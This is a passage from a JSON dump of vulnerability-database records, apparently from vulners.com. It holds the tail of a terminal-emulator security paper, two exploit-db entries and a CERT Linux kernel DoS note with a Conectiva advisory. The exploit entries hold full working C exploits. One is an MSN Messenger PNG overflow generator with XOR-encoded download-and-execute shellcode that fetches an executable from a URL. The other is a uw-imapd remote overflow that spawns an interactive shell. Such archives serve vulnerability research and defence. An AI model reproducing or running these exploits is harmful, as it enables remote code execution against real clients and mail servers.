http://www.eterm.org/docs/view.php?doc=ref\r\n--- xterm: http://rtfm.etla.org/xterm/ctlseq.html\r\n--- dtterm: http://hpc.uky.edu/cgi-bin/man.cgi?section=all&topic=dtterm\r\n--- rxvt: http://www.rxvt.org/refer/rxvtRef.html\r\n\r\nSolar Designer's Post on Syslog Filtering\r\n--- http://marc.theaimsgroup.com/?l=bugtraq&m=96938656931350\r\n\r\nADM's "The Evil Escape Sequences"\r\n--- http://www.attrition.org/security/advisory/ADM/adm.evil.esc.advisory\r\n\r\nAmigaOS Escape Sequence Exploits\r\n--- http://www.abraxis.co.uk/SA-2001-11-08.html\r\n\r\nMS-DOS/Windows Key Redefinition\r\n--- http://lists.insecure.org/lists/bugtraq/1994/Jul/0029.html\r\n\r\nMultiple Emulator Window Resize DoS\r\n--- http://archives.neohapsis.com/archives/bugtraq/2000-05/0409.html\r\n--- http://groups.google.com/groups?selm=E12zFeu-00075I-00%40ixion\r\n\r\nThe Original "Flash"\r\n--- http://www.parallaxresearch.com/files/unix/exploits/flash.c\r\n--- http://groups.google.com/groups?selm=342k7c%243ne%40news.ysu.edu\r\n--- http://www.phrack-dont-give-a-shit-about-dmca.org/show.php?p=47&a=4\r\n\r\n\r\n\r\n[ Credits ]\r\n\r\nThis paper was written by H D Moore, with much help from the rest of the Digital \r\nDefense Operations Team. I would like to thank Solar Designer for providing some great \r\nfeedback on the original draft and Mark Cox for handling the CVE candidate generation \r\nand vendor coordination.", "modified": "2003-02-25T00:00:00", "published": "2003-02-25T00:00:00", "id": "SECURITYVULNS:DOC:4128", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:4128", "title": "Terminal Emulator Security Issues", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-03T00:38:04", "bulletinFamily": "exploit", "description": "MSN Messenger 6.2.0137 PNG Buffer Overflow Vulnerability. CVE-2004-0597. Remote exploit for windows platform", "modified": "2005-02-08T00:00:00", "published": "2005-02-08T00:00:00", "id": "EDB-ID:25094", "href": "https://www.exploit-db.com/exploits/25094/", "type": "exploitdb", "title": "MSN Messenger 6.2.0137 PNG Buffer Overflow Vulnerability", "sourceData": "source: http://www.securityfocus.com/bid/12506/info\r\n\r\nA remotely exploitable buffer overflow exists in MSN Messenger and Windows Messenger. This vulnerability is related to parsing of Portable Network Graphics (PNG) image header data. Successful exploitation will result in execution of arbitrary code in the context of the vulnerable client user.\r\n\r\nAttack vectors and mitigations may differ for MSN Messenger and Windows Messenger. For Windows Messenger, the attacker must spoof the .NET Messenger service and the client must be configured to receive .NET alerts.\r\n\r\nHowever, MSN Messenger may be exploited through various methods in a client-to-client attack. Possible attack vectors for this vulnerability in MSN Messenger include:\r\nUser display pictures\r\nCustom icons that are displayed inline in instant messages\r\nThumbnails of transferred images\r\nBackground images\r\n\r\nSince this issue may be exploited in a client-to-client attack for MSN Messenger, it is a likely candidate for development of a worm.\r\n\r\n/*\r\n*\r\n* MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploit\r\n* Bug discoveried by Core Security Technologies (www.coresecurity.com)\r\n* Exploit coded By ATmaCA\r\n* Copyright ?2002-2005 AtmacaSoft Inc. All Rights Reserved.\r\n* Web: http://www.atmacasoft.com\r\n* E-Mail: atmaca@icqmail.com\r\n* Credit to kozan and delikon\r\n* Usage:exploit <OutputPath> <Url>\r\n*\r\n*/\r\n\r\n/*\r\n*\r\n* Tested with MSN Messenger 6.2.0137\r\n* This vulnerability can be exploited on Windows 2000 (all service packs)\r\n* and Windows XP (all service packs) that run vulnerable\r\n* clients of MSN Messenger.\r\n*\r\n*/\r\n\r\n/*\r\n*\r\n* After creating vuln png image, open\r\n* MSN Messenger and select it as your display picture in\r\n* \"Tools->Change Display Picture\".\r\n*\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <conio.h>\r\n#include <string.h>\r\n\r\n\r\n#ifdef __BORLANDC__\r\n #include <mem.h>\r\n#endif\r\n\r\n#define NOP 0x90\r\n\r\nchar png_header[] =\r\n\"\\x89\\x50\\x4E\\x47\\x0D\\x0A\\x1A\\x0A\\x00\\x00\\x00\\x0D\\x49\\x48\\x44\\x52\"\r\n\"\\x00\\x00\\x00\\x40\\x00\\x00\\x00\\x40\\x08\\x03\\x00\\x00\\x00\\x9D\\xB7\\x81\"\r\n\"\\xEC\\x00\\x00\\x01\\xB9\\x74\\x52\\x4E\\x53\";\r\n\r\nchar pngeof[] = \"\\x90\\x90\\x90\\x59\\xE8\\x47\\xFE\\xFF\\xFF\";\r\n\r\n/* Generic win32 http download shellcode\r\n xored with 0x1d by delikon (http://delikon.de/) */\r\nchar shellcode[] = \"\\xEB\"\r\n\"\\x10\\x58\\x31\\xC9\\x66\\x81\\xE9\\x22\\xFF\\x80\\x30\\x1D\\x40\\xE2\\xFA\\xEB\\x05\\xE8\\xEB\\xFF\"\r\n\"\\xFF\\xFF\\xF4\\xD1\\x1D\\x1D\\x1D\\x42\\xF5\\x4B\\x1D\\x1D\\x1D\\x94\\xDE\\x4D\\x75\\x93\\x53\\x13\"\r\n\"\\xF1\\xF5\\x7D\\x1D\\x1D\\x1D\\x2C\\xD4\\x7B\\xA4\\x72\\x73\\x4C\\x75\\x68\\x6F\\x71\\x70\\x49\\xE2\"\r\n\"\\xCD\\x4D\\x75\\x2B\\x07\\x32\\x6D\\xF5\\x5B\\x1D\\x1D\\x1D\\x2C\\xD4\\x4C\\x4C\\x90\\x2A\\x4B\\x90\"\r\n\"\\x6A\\x15\\x4B\\x4C\\xE2\\xCD\\x4E\\x75\\x85\\xE3\\x97\\x13\\xF5\\x30\\x1D\\x1D\\x1D\\x4C\\x4A\\xE2\"\r\n\"\\xCD\\x2C\\xD4\\x54\\xFF\\xE3\\x4E\\x75\\x63\\xC5\\xFF\\x6E\\xF5\\x04\\x1D\\x1D\\x1D\\xE2\\xCD\\x48\"\r\n\"\\x4B\\x79\\xBC\\x2D\\x1D\\x1D\\x1D\\x96\\x5D\\x11\\x96\\x6D\\x01\\xB0\\x96\\x75\\x15\\x94\\xF5\\x43\"\r\n\"\\x40\\xDE\\x4E\\x48\\x4B\\x4A\\x96\\x71\\x39\\x05\\x96\\x58\\x21\\x96\\x49\\x18\\x65\\x1C\\xF7\\x96\"\r\n\"\\x57\\x05\\x96\\x47\\x3D\\x1C\\xF6\\xFE\\x28\\x54\\x96\\x29\\x96\\x1C\\xF3\\x2C\\xE2\\xE1\\x2C\\xDD\"\r\n\"\\xB1\\x25\\xFD\\x69\\x1A\\xDC\\xD2\\x10\\x1C\\xDA\\xF6\\xEF\\x26\\x61\\x39\\x09\\x68\\xFC\\x96\\x47\"\r\n\"\\x39\\x1C\\xF6\\x7B\\x96\\x11\\x56\\x96\\x47\\x01\\x1C\\xF6\\x96\\x19\\x96\\x1C\\xF5\\xF4\\x1F\\x1D\"\r\n\"\\x1D\\x1D\\x2C\\xDD\\x94\\xF7\\x42\\x43\\x40\\x46\\xDE\\xF5\\x32\\xE2\\xE2\\xE2\\x70\\x75\\x75\\x33\"\r\n\"\\x78\\x65\\x78\\x1D\";\r\n\r\nFILE *di;\r\nint i = 0;\r\nshort int weblength;\r\nchar *web;\r\nchar *pointer = NULL;\r\nchar *newshellcode;\r\n\r\n/*xor cryptor*/\r\nchar *Sifrele(char *Name1)\r\n{\r\n char *Name=Name1;\r\n char xor=0x1d;\r\n int Size=strlen(Name);\r\n for(i=0;i<Size;i++)\r\n Name[i]=Name[i]^xor;\r\n return Name;\r\n}\r\n\r\n\r\nvoid main(int argc, char *argv[])\r\n{\r\n\r\n if (argc < 3)\r\n {\r\n printf(\"MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploit\\n\");\r\n printf(\"Bug discoveried by Core Security Technologies (www.coresecurity.com)\\n\");\r\n printf(\"Exploit coded By ATmaCA\\n\");\r\n printf(\"Copyright ?2002-2005 AtmacaSoft Inc. All Rights Reserved.\\n\");\r\n printf(\"Web: http://www.atmacasoft.com\\n\");\r\n printf(\"E-Mail: atmaca@icqmail.com\\n\");\r\n printf(\"Credit to kozan and delikon\\n\\n\");\r\n printf(\"\\tUsage:exploit <OutputPath> <Url>\\n\");\r\n printf(\"\\tExample:exploit vuln.png http://www.atmacasoft.com/exp/msg.exe\\n\");\r\n\r\n return;\r\n }\r\n\r\n\r\n web = argv[2];\r\n\r\n\r\n if( (di=fopen(argv[1],\"wb\")) == NULL )\r\n {\r\n printf(\"Error opening file!\\n\");\r\n return;\r\n }\r\n for(i=0;i<sizeof(png_header)-1;i++)\r\n fputc(png_header[i],di);\r\n\r\n /*stuff in a couple of NOPs*/\r\n for(i=0;i<99;i++)\r\n fputc(NOP,di);\r\n\r\n weblength=(short int)0xff22;\r\n pointer=strstr(shellcode,\"\\x22\\xff\");\r\n weblength-=strlen(web)+1;\r\n memcpy(pointer,&weblength,2);\r\n newshellcode = new char[sizeof(shellcode)+strlen(web)+1];\r\n strcpy(newshellcode,shellcode);\r\n strcat(newshellcode,Sifrele(web));\r\n strcat(newshellcode,\"\\x1d\");\r\n\r\n //shell code\r\n for(i=0;i<strlen(newshellcode);i++)\r\n fputc(newshellcode[i],di);\r\n\r\n\r\n for(i=0;i<(83-strlen(web));i++) //NOPs\r\n fputc(NOP,di);\r\n\r\n /*Overwriting the return address (EIP)*/\r\n /*0x005E0547 - ret */\r\n fputc(0x47,di);\r\n fputc(0x05,di);\r\n fputc(0x5e,di);\r\n fputc(0x00,di);\r\n\r\n for(i=0;i<sizeof(pngeof)-1;i++)\r\n fputc(pngeof[i],di);\r\n\r\n printf(\"Vulnarable png file %s has been generated!\\n\",argv[1]);\r\n\r\n fclose(di);\r\n}\r\n\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/25094/"}, {"lastseen": "2016-02-02T16:28:51", "bulletinFamily": "exploit", "description": "Wu-imapd 2000/2001 Partial Mailbox Attribute Remote Buffer Overflow Vulnerability (1). CVE-2002-0379. Remote exploit for linux platform", "modified": "2002-05-10T00:00:00", "published": "2002-05-10T00:00:00", "id": "EDB-ID:21442", "href": "https://www.exploit-db.com/exploits/21442/", "type": "exploitdb", "title": "Wu-imapd 2000/2001 Partial Mailbox Attribute Remote Buffer Overflow Vulnerability 1", "sourceData": "source: http://www.securityfocus.com/bid/4713/info\r\n\r\nWu-imapd is vulnerable to a buffer overflow condition. This has been reported to occur when a valid user requests partial mailbox attributes. Exploitation may result in the execution of arbitrary code as the server process. An attacker may also be able to crash the server, resulting in a denial of service condition.\r\n\r\nThis only affects versions of imapd with legacy RFC 1730 support, which is disabled by default in imapd 2001.313 and imap-2001.315. \r\n\r\n/*\r\n * http://www.freeweb.nu/mantra/05_2002/uw-imapd.html\r\n *\r\n * uw-imapd.c - Remote exploit for uw imapd CAPABILITY IMAP4\r\n *\r\n * Copyright (C) 2002 Christophe \"korty\" Bailleux <cb@t-online.fr>\r\n * Copyright (C) 2002 Kostya Kortchinsky <kostya.kortchinsky@renater.fr>\r\n *\r\n * All Rights Reserved\r\n * The copyright notice above does not evidence any\r\n * actual or intended publication of such source code.\r\n *\r\n * Usage: ./wu-imap host user password shellcode_addressr alignement\r\n *\r\n * Demonstration values for Linux:\r\n *\r\n * (slackware 7.1) ./uw-imap localhost test test1234 0xbffffa60 0\r\n * (Redhat 7.2) ./uw-imap localhost test test1234 0xbffff760 0\r\n *\r\n * THIS CODE FOR EDUCATIONAL USE ONLY IN AN ETHICAL MANNER\r\n *\r\n * The code is dirty...but we like dirty things :)\r\n * And it works very well :)\r\n *\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <netdb.h>\r\n\r\n#define GOOD_EXIT 0\r\n#define ERROR_EXIT 1\r\n\r\n#define DEFAULT_PROTOCOL 0\r\n#define SEND_FLAGS 0\r\n#define RECV_FLAGS 0\r\n\r\nchar sc[]=\r\n\"\\xeb\\x38\" /* jmp 0x38 */\r\n\"\\x5e\" /* popl %esi */\r\n\"\\x80\\x46\\x01\\x50\" /* addb $0x50,0x1(%esi) */\r\n\"\\x80\\x46\\x02\\x50\" /* addb $0x50,0x2(%esi) */\r\n\"\\x80\\x46\\x03\\x50\" /* addb $0x50,0x3(%esi) */\r\n\"\\x80\\x46\\x05\\x50\" /* addb $0x50,0x5(%esi) */\r\n\"\\x80\\x46\\x06\\x50\" /* addb $0x50,0x6(%esi) */\r\n\"\\x89\\xf0\" /* movl %esi,%eax */\r\n\"\\x83\\xc0\\x08\" /* addl $0x8,%eax */\r\n\"\\x89\\x46\\x08\" /* movl %eax,0x8(%esi) */\r\n\"\\x31\\xc0\" /* xorl %eax,%eax */\r\n\"\\x88\\x46\\x07\" /* movb %eax,0x7(%esi) */\r\n\"\\x89\\x46\\x0c\" /* movl %eax,0xc(%esi) */\r\n\"\\xb0\\x0b\" /* movb $0xb,%al */\r\n\"\\x89\\xf3\" /* movl %esi,%ebx */\r\n\"\\x8d\\x4e\\x08\" /* leal 0x8(%esi),%ecx */\r\n\"\\x8d\\x56\\x0c\" /* leal 0xc(%esi),%edx */\r\n\"\\xcd\\x80\" /* int $0x80 */\r\n\"\\x31\\xdb\" /* xorl %ebx,%ebx */\r\n\"\\x89\\xd8\" /* movl %ebx,%eax */\r\n\"\\x40\" /* inc %eax */\r\n\"\\xcd\\x80\" /* int $0x80 */\r\n\"\\xe8\\xc3\\xff\\xff\\xff\" /* call -0x3d */\r\n\"\\x2f\\x12\\x19\\x1e\\x2f\\x23\\x18\"; /* .string \"/bin/sh\" */\r\n\r\nint imap_send(int s, char *buffer)\r\n{\r\n int result = GOOD_EXIT;\r\n\r\n if (send(s, buffer, strlen(buffer), SEND_FLAGS) < 0)\r\n result = ERROR_EXIT;\r\n\r\n return result;\r\n}\r\n\r\nint imap_receive(int s, char *buffer, int size)\r\n{\r\n int result = GOOD_EXIT;\r\n int char_recv;\r\n int tot_recv = 0;\r\n\r\n bzero(buffer, size);\r\n do {\r\n char_recv = recv(s, &buffer[tot_recv], size - tot_recv, RECV_FLAGS);\r\n if (char_recv > 0)\r\n tot_recv += char_recv;\r\n } while ((char_recv > 0) && (strchr(buffer, 13) == NULL));\r\n\r\n if (char_recv < 0)\r\n result = ERROR_EXIT;\r\n\r\n return result;\r\n}\r\n\r\n#define BANNER \"pwd ; uname -a\"\r\n\r\nint interact( int fd )\r\n{\r\n fd_set fds;\r\n ssize_t ssize;\r\n char buffer[ 666 ];\r\n\r\n write( fd, BANNER\"\\n\", sizeof(BANNER) );\r\n while ( 12 != 42 ) {\r\n FD_ZERO( &fds );\r\n FD_SET( STDIN_FILENO, &fds );\r\n FD_SET( fd, &fds);\r\n select( fd + 1, &fds, NULL, NULL, NULL );\r\n\r\n if ( FD_ISSET(STDIN_FILENO, &fds) ) {\r\n ssize = read( STDIN_FILENO, buffer, sizeof(buffer) );\r\n if ( ssize < 0 ) {\r\n return( -1 );\r\n }\r\n if ( ssize == 0 ) {\r\n return( 0 );\r\n }\r\n\r\n write( fd, buffer, ssize );\r\n\r\n }\r\n\r\n if ( FD_ISSET(fd, &fds) ) {\r\n ssize = read( fd, buffer, sizeof(buffer) );\r\n if ( ssize < 0 ) {\r\n return( -1 );\r\n }\r\n if ( ssize == 0 ) {\r\n return( 0 );\r\n }\r\n\r\n write( STDOUT_FILENO, buffer, ssize );\r\n\r\n }\r\n }\r\n return( -1 );\r\n }\r\n\r\n\r\nvoid usage(char *cmd)\r\n{\r\n printf(\"Usage: %s host user pass shellcode_addr align\\n\", cmd);\r\n printf(\"Demo: %s localhost test test1234 0xbffffa40 0\\n\", cmd);\r\n exit(0);\r\n}\r\n\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n struct sockaddr_in server;\r\n struct servent *sp;\r\n struct hostent *hp;\r\n int s, i , ret, align;\r\n int blaw = 1024;\r\n char *user, *passwd;\r\n\r\n char imap_info[4096];\r\n char imap_login[4096];\r\n char imap_query[4096];\r\n char buffer[2048];\r\n\r\n int exit_code = GOOD_EXIT;\r\n\r\n if (argc != 6) usage(argv[0]);\r\n\r\n user = argv[2];\r\n passwd = argv[3];\r\n ret = strtoul(argv[4], NULL, 16);\r\n align = atoi(argv[5]);\r\n\r\n if ((hp = gethostbyname(argv[1])) == NULL)\r\n exit_code = ERROR_EXIT;\r\n\r\n if ((exit_code == GOOD_EXIT) && (sp = getservbyname(\"imap2\", \"tcp\")) ==\r\nNULL)\r\n exit_code = ERROR_EXIT;\r\n\r\n if (exit_code == GOOD_EXIT) {\r\n if ((s = socket(PF_INET, SOCK_STREAM, DEFAULT_PROTOCOL)) < 0)\r\n return exit_code = ERROR_EXIT;\r\n\r\n bzero((char *) &server, sizeof(server));\r\n bcopy(hp->h_addr, (char *) &server.sin_addr, hp->h_length);\r\n server.sin_family = hp->h_addrtype;\r\n server.sin_port = sp->s_port;\r\n if (connect(s, (struct sockaddr *) &server, sizeof(server)) < 0)\r\n exit_code = ERROR_EXIT;\r\n else {\r\n printf(\" [1;34mV\ufffdrification de la banni\ufffdre : [0m\\n\");\r\n if (exit_code = imap_receive(s, imap_info, sizeof(imap_info)) ==\r\nERROR_EXIT) {\r\n shutdown(s, 2);\r\n close(s);\r\n return exit_code;\r\n }\r\n\r\n printf(\"%s\", imap_info);\r\n if (strstr(imap_info, \"IMAP4rev1 200\") == NULL) {\r\n printf(\" [1;32mService IMAPd non reconnu ... [0m\\n\");\r\n shutdown(s, 2);\r\n close(s);\r\n return exit_code;\r\n }\r\n\r\n if ((exit_code = imap_send(s, \"x CAPABILITY\\n\")) == ERROR_EXIT) {\r\n shutdown(s, 2);\r\n close(s);\r\n return exit_code;\r\n }\r\n\r\n printf(\" [1;34mV\ufffdrification des options du service : [0m\\n\");\r\n if ((exit_code = imap_receive(s, imap_info, sizeof(imap_info))) ==\r\nERROR_EXIT) {\r\n shutdown(s, 2);\r\n close(s);\r\n return exit_code;\r\n }\r\n\r\n printf(\"%s\", imap_info);\r\n if (strstr(imap_info, \" IMAP4 \") == NULL) {\r\n printf(\" [1;32mService IMAPd non vuln\ufffdrable ... [0m\\n\");\r\n shutdown(s, 2);\r\n close(s);\r\n return exit_code;\r\n }\r\n\r\n printf(\" [1;31mService IMAPd vuln\ufffdrable ... [0m\\n\");\r\n sprintf(imap_login, \"x LOGIN %s %s\\n\", user, passwd);\r\n if ((exit_code = imap_send(s, imap_login)) == ERROR_EXIT) {\r\n shutdown(s, 2);\r\n close(s);\r\n return exit_code;\r\n }\r\n\r\n if ((exit_code = imap_receive(s, imap_info, sizeof(imap_info))) ==\r\nERROR_EXIT) {\r\n shutdown(s, 2);\r\n close(s);\r\n return exit_code;\r\n }\r\n printf(\"%s\", imap_info);\r\n\r\n if ((exit_code = imap_send(s, \"x SELECT Inbox\\n\")) == ERROR_EXIT) {\r\n shutdown(s, 2);\r\n close(s);\r\n return exit_code;\r\n }\r\n\r\n if ((exit_code = imap_receive(s, imap_info, sizeof(imap_info))) ==\r\nERROR_EXIT) {\r\n shutdown(s, 2);\r\n close(s);\r\n return exit_code;\r\n }\r\n printf(\"%s\", imap_info);\r\n\r\n memset(buffer, 0x90, sizeof(buffer));\r\n memcpy(buffer + 512, sc, strlen(sc));\r\n\r\n for (i = blaw + align ; i < 1096; i +=4)\r\n *(unsigned int *)(&buffer[i]) = ret;\r\n\r\n *(unsigned int *)(&buffer[i + 1]) = 0;\r\n\r\n sprintf(imap_query, \"x PARTIAL 1 BODY[%s] 1 1\\n\", buffer);\r\n if ((exit_code = imap_send(s, imap_query)) == ERROR_EXIT) {\r\n shutdown(s, 2);\r\n close(s);\r\n return exit_code;\r\n }\r\n\r\n if ((exit_code = imap_receive(s, imap_info, sizeof(imap_info))) ==\r\nERROR_EXIT) {\r\n shutdown(s, 2);\r\n close(s);\r\n return exit_code;\r\n }\r\n\r\n if ((exit_code = imap_send(s, \"x LOGOUT\\n\")) == ERROR_EXIT) {\r\n shutdown(s, 2);\r\n close(s);\r\n return exit_code;\r\n }\r\n\r\n if ((exit_code = imap_receive(s, imap_info, sizeof(imap_info))) ==\r\nERROR_EXIT) {\r\n shutdown(s, 2);\r\n close(s);\r\n return exit_code;\r\n }\r\n }\r\n }\r\n\r\n i = interact( s );\r\n\r\n return exit_code;\r\n}\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/21442/"}], "cert": [{"lastseen": "2019-05-29T20:44:10", "bulletinFamily": "info", "description": "### Overview \n\nThe Linux kernel contains a denial-of-service vulnerability that allows local users to disable affected hosts.\n\n### Description \n\nSeveral versions of the Linux kernel contain a defect in their use of the Intel processor instruction set. The \"fsave\" and \"frstor\" instructions are used to store and restore the state of the processor's floating point unit (FPU), respectively. Typically, manipulation of the FPU is handled by the compiler of a high-level programming language, but some languages allow programmers to invoke assembly instructions directly.\n\nBy using a combination of calls to fsave and frstor, it is possible to write a simple program that will force the Linux kernel into an infinite signal handling loop. When this occurs, the kernel will fail to operate properly or respond to input, causing a denial-of-service condition. Such a program does not require specialized tools or privileged system access, so it is possible for any local user to exploit this vulnerability. \n \n--- \n \n### Impact \n\nThis vulnerability allows local users to disable the Linux kernel on affected hosts, resulting in a denial-of-service condition. \n \n--- \n \n### Solution \n\n**Apply a patch from your vendor** \n \nThe Systems Affected section of this document contains a list of vendors that have been notified of this issue, as well as their responses. \n \n--- \n \n### Vendor Information\n\n973654\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ __ Conectiva\n\nNotified: June 15, 2004 Updated: August 18, 2004 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\n`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \n- -------------------------------------------------------------------------- \nCONECTIVA LINUX SECURITY ANNOUNCEMENT \n- -------------------------------------------------------------------------- \n \nPACKAGE : kernel \nSUMMARY : Fixes for kernel vulnerabilities \nDATE : 2004-06-22 10:12:00 \nID : CLA-2004:845 \nRELEVANT \nRELEASES : 8, 9 \n \n- ------------------------------------------------------------------------- \n \nDESCRIPTION \nThe Linux kernel is responsible for handling the basic functions of \nthe GNU/Linux operating system. \n \nThis announcement fixes the following vulnerabilities: \n \n1. Local denial of service vulnerability (CAN-2004-0554[1]) \n \nStian Skjelstad found[2] a vulnerability[1] in the fpu controller \ncode that can be used by local attackers to cause a denial of service \n(DoS) on the system. \n \n2. Local memory disclosure vulnerability (CAN-2004-0535[3]) \n \nChris Wright found a vulnerability[3] in the Intel(R) PRO/1000 \nethernet card driver that could allow a local attacker to read some \nbytes of kernel memory. \n \n3. Sparse vulnerabilities (CAN-2004-0495[4]) \n \nAl Viro, by using Sparse[5] (a code inspection tool), found several \nvulnerabilities which, in the worst case, might allow local attackers \nto obtain root privileges. \n \n \nSOLUTION \nIt is recommended that all Conectiva Linux users upgrade the kernel \npackage. \n \nIMPORTANT: exercise caution and preparation when upgrading the \nkernel, since it will require a reboot after the new packages are \ninstalled. In particular, Conectiva Linux 9 will most likely require \nan initrd file (which is automatically created in the /boot directory \nafter the new packages are installed). Generic kernel update \ninstructions can be obtained in the manuals and in our updates \npage[6]. More detailed instructions are also available in Portuguese \nat our Moin[7] page. \n \n \nREFERENCES: \n1.http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0554 \n2.http://marc.theaimsgroup.com/?l=linux-kernel&m=108681568931323&w=2 \n3.http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0535 \n4.http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0495 \n5.http://sparse.bkbits.net:8080/sparse/ \n6.https://moin.conectiva.com.br/UpdatingKernelPackages \n7.http://www.conectiva.com.br/suporte/pr/sistema.kernel.atualizar.html \n \n \n \nUPDATED PACKAGES \n<ftp://atualizacoes.conectiva.com.br/8/SRPMS/kernel-2.4.19-1U80_22cl.src.rpm> \n<ftp://atualizacoes.conectiva.com.br/8/RPMS/devfsd-2.4.19-1U80_22cl.i386.rpm> \n<ftp://atualizacoes.conectiva.com.br/8/RPMS/kernel-2.4.19-1U80_22cl.i386.rpm> \n<ftp://atualizacoes.conectiva.com.br/8/RPMS/kernel-2.4.19-1U80_22cl.i586.rpm> \n<ftp://atualizacoes.conectiva.com.br/8/RPMS/kernel-2.4.19-1U80_22cl.i686.rpm> \n<ftp://atualizacoes.conectiva.com.br/8/RPMS/kernel-BOOT-2.4.19-1U80_22cl.i386.rpm> \n<ftp://atualizacoes.conectiva.com.br/8/RPMS/kernel-doc-2.4.19-1U80_22cl.i386.rpm> \n<ftp://atualizacoes.conectiva.com.br/8/RPMS/kernel-enterprise-2.4.19-1U80_22cl.i686.rpm> \n<ftp://atualizacoes.conectiva.com.br/8/RPMS/kernel-headers-2.4.19-1U80_22cl.i386.rpm> \n<ftp://atualizacoes.conectiva.com.br/8/RPMS/kernel-rbc-2.4.19-1U80_22cl.i386.rpm> \n<ftp://atualizacoes.conectiva.com.br/8/RPMS/kernel-smp-2.4.19-1U80_22cl.i386.rpm> \n<ftp://atualizacoes.conectiva.com.br/8/RPMS/kernel-smp-2.4.19-1U80_22cl.i586.rpm> \n<ftp://atualizacoes.conectiva.com.br/8/RPMS/kernel-smp-2.4.19-1U80_22cl.i686.rpm> \n<ftp://atualizacoes.conectiva.com.br/8/RPMS/kernel-source-2.4.19-1U80_22cl.i386.rpm> \n<ftp://atualizacoes.conectiva.com.br/9/SRPMS/kernel24-2.4.21-31301U90_16cl.src.rpm> \n<ftp://atualizacoes.conectiva.com.br/9/RPMS/devfsd-2.4.21-31301U90_16cl.i386.rpm> \n<ftp://atualizacoes.conectiva.com.br/9/RPMS/kernel24-2.4.21-31301U90_16cl.athlon.rpm> \n<ftp://atualizacoes.conectiva.com.br/9/RPMS/kernel24-2.4.21-31301U90_16cl.i386.rpm> \n<ftp://atualizacoes.conectiva.com.br/9/RPMS/kernel24-2.4.21-31301U90_16cl.i586.rpm> \n<ftp://atualizacoes.conectiva.com.br/9/RPMS/kernel24-2.4.21-31301U90_16cl.i686.rpm> \n<ftp://atualizacoes.conectiva.com.br/9/RPMS/kernel24-2.4.21-31301U90_16cl.pentium4.rpm> \n<ftp://atualizacoes.conectiva.com.br/9/RPMS/kernel24-BOOT-2.4.21-31301U90_16cl.i386.rpm> \n<ftp://atualizacoes.conectiva.com.br/9/RPMS/kernel24-doc-2.4.21-31301U90_16cl.i386.rpm> \n<ftp://atualizacoes.conectiva.com.br/9/RPMS/kernel24-enterprise-2.4.21-31301U90_16cl.athlon.rpm> \n<ftp://atualizacoes.conectiva.com.br/9/RPMS/kernel24-enterprise-2.4.21-31301U90_16cl.i686.rpm> \n<ftp://atualizacoes.conectiva.com.br/9/RPMS/kernel24-enterprise-2.4.21-31301U90_16cl.pentium4.rpm> \n<ftp://atualizacoes.conectiva.com.br/9/RPMS/kernel24-headers-2.4.21-31301U90_16cl.i386.rpm> \n<ftp://atualizacoes.conectiva.com.br/9/RPMS/kernel24-rbc-2.4.21-31301U90_16cl.i386.rpm> \n<ftp://atualizacoes.conectiva.com.br/9/RPMS/kernel24-smp-2.4.21-31301U90_16cl.athlon.rpm> \n<ftp://atualizacoes.conectiva.com.br/9/RPMS/kernel24-smp-2.4.21-31301U90_16cl.i386.rpm> \n<ftp://atualizacoes.conectiva.com.br/9/RPMS/kernel24-smp-2.4.21-31301U90_16cl.i586.rpm> \n<ftp://atualizacoes.conectiva.com.br/9/RPMS/kernel24-smp-2.4.21-31301U90_16cl.i686.rpm> \n<ftp://atualizacoes.conectiva.com.br/9/RPMS/kernel24-smp-2.4.21-31301U90_16cl.pentium4.rpm> \n<ftp://atualizacoes.conectiva.com.br/9/RPMS/kernel24-source-2.4.21-31301U90_16cl.i386.rpm> \n \n \nADDITIONAL INSTRUCTIONS \nThe apt tool can be used to perform RPM packages upgrades: \n \n- run: apt-get update \n- after that, execute: apt-get upgrade \n \nDetailed instructions regarding the use of apt and upgrade examples \ncan be found at <http://distro.conectiva.com.br/atualizacoes/#apt?idioma=en> \n \n- ------------------------------------------------------------------------- \nAll packages are signed with Conectiva's GPG key. The key and instructions \non how to import it can be found at \n<http://distro.conectiva.com.br/seguranca/chave/?idioma=en> \nInstructions on how to check the signatures of the RPM packages can be \nfound at <http://distro.conectiva.com.br/seguranca/politica/?idioma=en> \n \n- ------------------------------------------------------------------------- \nAll our advisories and generic update instructions can be viewed at \n<http://distro.conectiva.com.br/atualizacoes/?idioma=en> \n \n- ------------------------------------------------------------------------- \nCopyright (c) 2004 Conectiva Inc. \n<http://www.conectiva.com> \n \n- ------------------------------------------------------------------------- \nsubscribe: conectiva-updates-subscribe@papaleguas.conectiva.com.br \nunsubscribe: conectiva-updates-unsubscribe@papaleguas.conectiva.com.br \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.0.6 (GNU/Linux) \nComment: For info see <http://www.gnupg.org> \n \niD8DBQFA2DCq42jd0JmAcZARAg49AJ9sqVjI/FsSEeWfws1iPyJ0szUIPgCfZ9kw \ny6YY+kD2FTucN7+WNLkZZKg= \n=NSse \n-----END PGP SIGNATURE-----`\n\n### Vendor 